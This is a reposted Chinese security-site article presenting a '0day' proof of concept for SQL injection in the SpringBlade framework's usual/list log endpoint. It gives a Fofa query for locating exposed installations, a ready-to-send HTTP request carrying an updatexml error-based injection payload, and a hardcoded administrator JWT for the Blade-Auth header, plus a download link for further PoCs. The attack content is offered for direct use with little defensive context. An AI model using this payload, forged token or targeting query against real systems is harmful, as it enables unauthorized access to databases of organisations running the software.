SpringBlade系统usual接口存在SQL注入漏洞 PoC

admin 2024年8月10日11:26:14评论50 views字数 1091阅读3分38秒阅读模式

SpringBlade简介

SpringBlade是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.5 、Spring Cloud 2020等核心技术构建,完全遵循阿里巴巴编码规范。

漏洞描述

SpringBlade系统usual接口存在SQL注入漏洞

Fofa语法

body="https://bladex.vip"

响应内容特征

SpringBlade系统usual接口存在SQL注入漏洞 PoC

获取最新POC

漏洞POC

GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1

Host:

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0

Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ

Connection: close

响应代码特征

200

响应内容特征

SpringBlade系统usual接口存在SQL注入漏洞 PoC

链接: https://pan.baidu.com/s/1psAzpPc_Jt5ckyfe4o1jNQ?pwd=kjm4 提取码: kjm4

原文始发于微信公众号(7coinSec):【0day】SpringBlade系统usual接口存在SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月10日11:26:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SpringBlade系统usual接口存在SQL注入漏洞 PoChttp://cn-sec.com/archives/3050591.html

发表评论

匿名网友 填写信息